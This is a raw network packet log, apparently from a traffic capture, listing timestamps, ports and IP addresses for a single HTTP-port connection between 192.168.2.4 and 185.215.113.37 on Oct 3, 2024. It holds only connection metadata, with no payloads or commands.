Oct 3, 2024 18:38:23.391697884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391727924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391729116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391750097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391776085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391782999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391819000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391828060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391851902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391865969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391887903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391904116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391923904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391936064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391958952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391978979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391993046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.392005920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.392028093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.392038107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.392065048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.392071962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.392111063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395173073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395206928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395231009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395240068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395251989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395278931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395292044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395325899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395339012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395358086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395365953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395412922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395426035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395447016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395457983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395483017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395488024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395518064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395522118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395551920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395562887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395596981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395612001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395646095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395713091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395745993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395760059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395781040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395790100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395816088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395824909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395849943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395859957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395884991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395895004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395921946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395931005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395956039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395966053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.395991087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.395999908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396024942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396035910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396059990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396070004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396094084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396120071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396130085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396164894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396190882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396357059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396389961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396411896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396425009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396450996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396490097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396492958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396524906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396548986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396559000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396589994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396591902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396599054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396625996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396655083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396658897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396684885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396692991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396720886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396728039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396759033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396761894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396795034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396795988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396804094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396828890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396859884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396863937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396891117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396898985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396923065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396934032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396965981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.396969080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.396975994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397003889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397034883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397036076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397053957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397098064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397325993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397360086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397391081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397392988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397399902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397427082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397459984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397459984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397469044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397492886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397531033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397531033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397548914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397566080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397594929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397598982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397624969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397633076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397664070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397665977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397694111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397700071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397733927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397736073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397746086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397768021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397797108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397799969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397825003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397834063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397867918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397875071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397883892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397902966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397936106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397948980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.397970915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.397995949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398005962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398024082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398076057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398175955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398210049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398242950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398257971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398277998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398308039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398312092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398325920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398344994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.398371935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.398402929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472043991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472088099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472122908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472141981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472173929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472208023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472242117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472256899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472275972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472289085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472316980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472321033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472349882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472361088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472395897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472413063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472445011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472460032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472481012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472496033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472516060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472549915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472563982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472584009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472595930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472619057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472630024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472660065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472665071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472706079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472734928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472768068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472784042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472801924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472812891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472836971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472848892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472872019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472883940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472907066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472922087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472939968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472954988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.472975016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.472986937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.473018885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.473083019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.473115921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.473150015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.473160028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.473186016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.473195076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.473234892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.482822895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.482872009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.482897043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.482911110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.482918024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.482945919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.482953072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483005047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483041048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483056068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483091116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483097076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483131886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483140945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483166933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483201981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483216047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483237028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483246088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483270884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483288050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483305931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483318090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483340979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483355999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.483380079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.483437061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486143112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486206055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486228943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486280918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486288071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486316919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486326933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486351967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486363888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486387014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486398935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486434937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486439943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486475945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486495018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486527920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486561060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486573935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486596107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486608982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486629963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486639023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486665010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486674070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486700058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486710072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486735106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486747026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486771107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486782074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486807108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.486818075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486855030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.486991882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487021923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487055063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487066031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487143040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487194061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487199068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487229109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487237930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487263918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487274885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487298012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487308979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487333059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487349033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487366915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487375975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487415075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487423897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487457037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487463951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487502098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487600088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487637043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487656116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487669945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487682104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487704992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487715006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487739086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487747908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487792015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487804890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487828016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487839937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487863064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487874031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487900019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487910032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487934113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487948895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.487967968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.487983942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488001108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488003969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488039017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488046885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488087893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488246918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488281965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488311052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488321066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488332033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488354921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488364935 CEST	49730	80	192.168.2.4	185.215.113.37
